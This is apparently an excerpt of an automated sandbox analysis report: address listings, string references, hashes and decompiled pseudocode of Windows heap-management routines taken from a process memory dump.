                                          0x0110830f
                                          0x010b3f9b
                                          0x010b3fac
                                          0x010b3fae
                                          0x010b3fb1
                                          0x010b3fb1
                                          0x010b3fb6
                                          0x01108317
                                          0x0110831a
                                          0x00000000
                                          0x010b3fbc
                                          0x010b3fc1
                                          0x010b3fc9
                                          0x010b3fd7
                                          0x010b3fda
                                          0x010b3fdd
                                          0x010b4021
                                          0x010b4021
                                          0x010b4029
                                          0x010b4030
                                          0x010b4044
                                          0x010b4046
                                          0x010b4046
                                          0x010b4044
                                          0x010b4049
                                          0x01108327
                                          0x01108334
                                          0x01108339
                                          0x0110833c
                                          0x010b404f
                                          0x010b404f
                                          0x010b404f
                                          0x010b4051
                                          0x010b4056
                                          0x010b4063
                                          0x010b4063
                                          0x010b4068
                                          0x00000000
                                          0x010b4068
                                          0x010b3fdf
                                          0x010b3fe2
                                          0x010b3fe4
                                          0x010b3fe7
                                          0x010b3fef
                                          0x010b4003
                                          0x010b4005
                                          0x010b4005
                                          0x010b400c
                                          0x010b4013
                                          0x010b4016
                                          0x010b4017
                                          0x010b401b
                                          0x010b401e
                                          0x00000000
                                          0x010b401e
                                          0x010b3fb6
                                          0x010b3eb1
                                          0x010b3eb4
                                          0x010b3eb7
                                          0x010b3ebc
                                          0x011082a9
                                          0x011082ab
                                          0x010b3ec2
                                          0x010b3ed3
                                          0x010b3ed5
                                          0x010b3ed8
                                          0x010b3ed8
                                          0x010b3edd
                                          0x011082b3
                                          0x011082b6
                                          0x00000000
                                          0x010b3ee3
                                          0x010b3ee8
                                          0x010b3eed
                                          0x010b3ef0
                                          0x010b3ef3
                                          0x010b3f02
                                          0x010b3f05
                                          0x010b3f08
                                          0x011082c0
                                          0x011082c3
                                          0x011082c5
                                          0x011082c8
                                          0x011082d0
                                          0x011082e4
                                          0x011082e6
                                          0x011082e6
                                          0x011082ed
                                          0x011082f4
                                          0x011082f7
                                          0x011082f8
                                          0x011082fc
                                          0x011082ff
                                          0x011082ff
                                          0x010b3f0e
                                          0x010b3f11
                                          0x010b3f16
                                          0x010b3f1d
                                          0x010b3f31
                                          0x01108307
                                          0x01108307
                                          0x010b3f31
                                          0x010b3f39
                                          0x010b3f48
                                          0x010b3f4d
                                          0x010b3f50
                                          0x010b3f50
                                          0x010b3f53
                                          0x010b3f58
                                          0x010b3f65
                                          0x010b3f65
                                          0x010b3f6a
                                          0x00000000
                                          0x010b3f6a
                                          0x010b3edd
                                          0x010b3dda
                                          0x010b3ddd
                                          0x010b3de0
                                          0x010b3de5
                                          0x01108245
                                          0x010b3deb
                                          0x010b3df7
                                          0x010b3dfc
                                          0x010b3dfe
                                          0x010b3e01
                                          0x010b3e01
                                          0x010b3e06
                                          0x0110824d
                                          0x0110824f
                                          0x01108254
                                          0x00000000
                                          0x010b3e0c
                                          0x010b3e11
                                          0x010b3e16
                                          0x010b3e19
                                          0x010b3e29
                                          0x010b3e2c
                                          0x010b3e2f
                                          0x0110825c
                                          0x0110825f
                                          0x01108261
                                          0x01108264
                                          0x0110826c
                                          0x01108280
                                          0x01108282
                                          0x01108282
                                          0x01108289
                                          0x01108290
                                          0x01108293
                                          0x01108294
                                          0x01108298
                                          0x0110829b
                                          0x0110829b
                                          0x010b3e35
                                          0x010b3e38
                                          0x010b3e3d
                                          0x010b3e44
                                          0x010b3e58
                                          0x011082a3
                                          0x011082a3
                                          0x010b3e58
                                          0x010b3e60
                                          0x010b3e6f
                                          0x010b3e74
                                          0x010b3e77
                                          0x010b3e77
                                          0x010b3e7a
                                          0x010b3e7f
                                          0x010b3e8c
                                          0x010b3e8c
                                          0x010b3e91
                                          0x00000000
                                          0x010b3e91

                                          Strings
                                          • WindowsExcludedProcs, xrefs: 010B3D6F
                                          • Kernel-MUI-Number-Allowed, xrefs: 010B3D8C
                                          • Kernel-MUI-Language-Disallowed, xrefs: 010B3E97
                                          • Kernel-MUI-Language-Allowed, xrefs: 010B3DC0
                                          • Kernel-MUI-Language-SKU, xrefs: 010B3F70
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                          • API String ID: 0-258546922
                                          • Opcode ID: a6fe31d560859f4c256e3276df8b374b0f78f15dca23d2155d16c57f8876df70
                                          • Instruction ID: 7c8274aa9cb21f6e3a8bf3d80c7944d5062450aed5c3f26447d48e22af02c858
                                          • Opcode Fuzzy Hash: a6fe31d560859f4c256e3276df8b374b0f78f15dca23d2155d16c57f8876df70
                                          • Instruction Fuzzy Hash: 4FF16F72D0421AEFCB16DF98C980AEEBBF9FF58650F15405AE585E7251E7709E00CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010A40E1 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 29%
                                          			E010A40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E010AB150();
					} else {
						E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E010AB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E010AB150(", passed to %s", _t29);
					}
					_push("\n");
					E010AB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1196378 = 1;
						asm("int3");
						 *0x1196378 = 0;
					}
					return 0;
				}
				return 1;
			}





                                          0x010a40e6
                                          0x010a40e8
                                          0x010a40f1
                                          0x0110042d
                                          0x0110044c
                                          0x01100451
                                          0x0110042f
                                          0x01100444
                                          0x01100449
                                          0x0110045d
                                          0x01100466
                                          0x0110046e
                                          0x01100474
                                          0x01100475
                                          0x0110047a
                                          0x0110048a
                                          0x0110048c
                                          0x01100493
                                          0x01100494
                                          0x01100494
                                          0x00000000
                                          0x0110049b
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                          • API String ID: 0-188067316
                                          • Opcode ID: 44c3e27b7cc83817c9632c30cd92335e82a13aaa66d9181b31802aabedab3556
                                          • Instruction ID: 81ef85ea93170b46111e46c15af88b1c5f8e7fe16f412790309cb0e367ed953b
                                          • Opcode Fuzzy Hash: 44c3e27b7cc83817c9632c30cd92335e82a13aaa66d9181b31802aabedab3556
                                          • Instruction Fuzzy Hash: 510170325082419ED33EA7A9E44DF927BA4DB40F70F5B402DF0898B781CFE9A4C0C625
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010CA830 Relevance: 5.4, Strings: 4, Instructions: 350COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E010CA830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x1198748 - 1;
					if( *0x1198748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E010AB150();
									_t260 = _t257 + 4;
								} else {
									E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E010AB150();
								_t257 = _t260 + 4;
								__eflags =  *0x1197bc8;
								if(__eflags == 0) {
									E01162073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E0116A80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E010FD5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E010CAB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E0116A80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E0116A80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x1198748 - 1;
					if( *0x1198748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E010AB150();
							} else {
								E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E010AB150();
							__eflags =  *0x1197bc8;
							if(__eflags == 0) {
								_t131 = E01162073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}























































                                          0x010ca83a
                                          0x010ca83c
                                          0x010ca83e
                                          0x010ca841
                                          0x010ca844
                                          0x010ca84a
                                          0x010caa53
                                          0x010caa59
                                          0x010caa59
                                          0x010ca858
                                          0x010ca85e
                                          0x010caaf5
                                          0x010caafc
                                          0x0111229e
                                          0x011122a2
                                          0x011122a8
                                          0x011122b3
                                          0x011122b5
                                          0x011122bb
                                          0x011122c1
                                          0x011122c5
                                          0x011122e6
                                          0x011122eb
                                          0x011122f0
                                          0x011122c7
                                          0x011122dc
                                          0x011122e1
                                          0x011122e1
                                          0x011122f3
                                          0x011122f8
                                          0x011122fd
                                          0x01112300
                                          0x01112307
                                          0x0111230e
                                          0x0111230e
                                          0x01112313
                                          0x01112313
                                          0x011122b5
                                          0x011122a2
                                          0x010caafc
                                          0x010ca864
                                          0x010ca869
                                          0x010caa5c
                                          0x010caa5e
                                          0x010ca86f
                                          0x010ca87f
                                          0x010ca885
                                          0x010ca885
                                          0x010ca88b
                                          0x010ca890
                                          0x010ca896
                                          0x010cab0c
                                          0x010cab0f
                                          0x010cab15
                                          0x01112320
                                          0x01112320
                                          0x010cab1b
                                          0x010ca89c
                                          0x010ca89f
                                          0x010ca8a2
                                          0x010ca8a2
                                          0x010ca8a5
                                          0x010ca8af
                                          0x010ca8b3
                                          0x010ca8b8
                                          0x010caa66
                                          0x010ca8be
                                          0x010ca8c5
                                          0x010ca8c6
                                          0x010ca8ce
                                          0x01112328
                                          0x01112332
                                          0x01112337
                                          0x01112337
                                          0x010ca8ce
                                          0x010ca8d4
                                          0x010ca8d8
                                          0x010ca8db
                                          0x010ca8de
                                          0x010ca8e1
                                          0x010ca8e5
                                          0x010ca8e8
                                          0x010ca8f0
                                          0x010ca8f3
                                          0x0111234c
                                          0x01112350
                                          0x01112355
                                          0x01112359
                                          0x01112359
                                          0x010ca8f9
                                          0x010ca901
                                          0x010caae4
                                          0x010caae4
                                          0x010caaea
                                          0x00000000
                                          0x010ca907
                                          0x010ca90a
                                          0x010ca91d
                                          0x010ca91d
                                          0x00000000
                                          0x010ca910
                                          0x010ca910
                                          0x010ca910
                                          0x010ca914
                                          0x010ca924
                                          0x010ca924
                                          0x010ca924
                                          0x010ca924
                                          0x010ca916
                                          0x010ca91b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010ca91b
                                          0x010ca925
                                          0x010ca925
                                          0x010ca932
                                          0x010ca936
                                          0x010ca93c
                                          0x010ca93c
                                          0x010ca93c
                                          0x010cab22
                                          0x010cab24
                                          0x010cab27
                                          0x010cab27
                                          0x010ca942
                                          0x010ca944
                                          0x010caaba
                                          0x010caabd
                                          0x010caac0
                                          0x010caac0
                                          0x010caac2
                                          0x010cab2f
                                          0x010caac4
                                          0x010caac4
                                          0x010caac7
                                          0x010caaca
                                          0x010caacc
                                          0x010caace
                                          0x010caace
                                          0x010caace
                                          0x010caad1
                                          0x010caad1
                                          0x010caad7
                                          0x010caad9
                                          0x00000000
                                          0x00000000
                                          0x01112361
                                          0x01112369
                                          0x0111236b
                                          0x00000000
                                          0x01112371
                                          0x00000000
                                          0x01112371
                                          0x00000000
                                          0x0111236b
                                          0x010caac0
                                          0x010ca94a
                                          0x010ca94a
                                          0x010ca94d
                                          0x010ca94d
                                          0x010ca950
                                          0x010ca954
                                          0x01112376
                                          0x01112380
                                          0x010ca95a
                                          0x010ca95a
                                          0x010ca95c
                                          0x010ca95f
                                          0x010ca961
                                          0x010ca961
                                          0x010ca967
                                          0x010ca96a
                                          0x010ca972
                                          0x010caa02
                                          0x010caa06
                                          0x010caa10
                                          0x010caa16
                                          0x010caa16
                                          0x010caa1b
                                          0x010caa21
                                          0x010caa24
                                          0x010caa27
                                          0x010caa29
                                          0x010caa2c
                                          0x010caa32
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010ca978
                                          0x010ca978
                                          0x010ca97b
                                          0x010ca981
                                          0x010ca996
                                          0x010ca998
                                          0x010ca99f
                                          0x010ca9a2
                                          0x0111238a
                                          0x010ca9a8
                                          0x010ca9a8
                                          0x010ca9a8
                                          0x010ca9aa
                                          0x010ca9ad
                                          0x010ca9b0
                                          0x010ca9bb
                                          0x010ca9be
                                          0x010ca9c7
                                          0x010ca9c9
                                          0x010ca9c9
                                          0x010ca9cc
                                          0x010ca9d1
                                          0x010caa6d
                                          0x010caa70
                                          0x010caa73
                                          0x010caa75
                                          0x010caa79
                                          0x010caa7e
                                          0x010caa82
                                          0x010caa8f
                                          0x010caa94
                                          0x010caa96
                                          0x01112392
                                          0x011123a1
                                          0x011123a1
                                          0x010caa9c
                                          0x010caa9f
                                          0x010caaa2
                                          0x010caaa2
                                          0x010caaa8
                                          0x010caaab
                                          0x010caaaf
                                          0x00000000
                                          0x010caab5
                                          0x00000000
                                          0x010caab5
                                          0x010ca9d7
                                          0x010ca9d7
                                          0x010ca9da
                                          0x010ca9e0
                                          0x010ca9e3
                                          0x010ca9e6
                                          0x010ca9e9
                                          0x010ca9eb
                                          0x010ca9fd
                                          0x010ca9fd
                                          0x00000000
                                          0x010ca9eb
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010ca983
                                          0x010ca983
                                          0x010ca983
                                          0x010ca987
                                          0x010ca995
                                          0x010ca995
                                          0x010ca995
                                          0x010ca995
                                          0x010ca989
                                          0x010ca98e
                                          0x00000000
                                          0x010ca990
                                          0x00000000
                                          0x010ca990
                                          0x010ca98e
                                          0x00000000
                                          0x010ca983
                                          0x010ca972
                                          0x010ca90a
                                          0x010caa34
                                          0x010caa34
                                          0x010caa40
                                          0x010caa43
                                          0x010caa46
                                          0x010caa4d
                                          0x011123ab
                                          0x011123b2
                                          0x011123b8
                                          0x011123be
                                          0x011123c3
                                          0x011123c5
                                          0x011123cb
                                          0x011123d1
                                          0x011123d5
                                          0x011123f6
                                          0x011123fb
                                          0x011123d7
                                          0x011123ec
                                          0x011123f1
                                          0x01112403
                                          0x01112408
                                          0x01112410
                                          0x01112417
                                          0x01112422
                                          0x01112422
                                          0x01112417
                                          0x011123c5
                                          0x011123b2
                                          0x00000000

                                          Strings
                                          • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 011122F3
                                          • HEAP: , xrefs: 011122E6, 011123F6
                                          • HEAP[%wZ]: , xrefs: 011122D7, 011123E7
                                          • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01112403
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                          • API String ID: 0-1657114761
                                          • Opcode ID: e0eeb30d725807655fe374d2e93e60d97755760ef10df7e28f0cfb16d94a99b2
                                          • Instruction ID: 35a37a3fe08fd6299d302d25fb30bbc46d2e1d85df9d5c72dcba6b870b267c56
                                          • Opcode Fuzzy Hash: e0eeb30d725807655fe374d2e93e60d97755760ef10df7e28f0cfb16d94a99b2
                                          • Instruction Fuzzy Hash: 1FD1AC34B0460ADFDB29CF68C490BAEBBF1EF48600F15856DD99A9B346E330A945CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010CA229 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 69%
                                          			E010CA229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E010CDF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E010E9730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E0116A80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E010E9660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E010AB150();
					} else {
						E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E010AB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E010C7D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E0116138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E010C7D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E010C7D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E01161582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E010C7D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E010C7D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
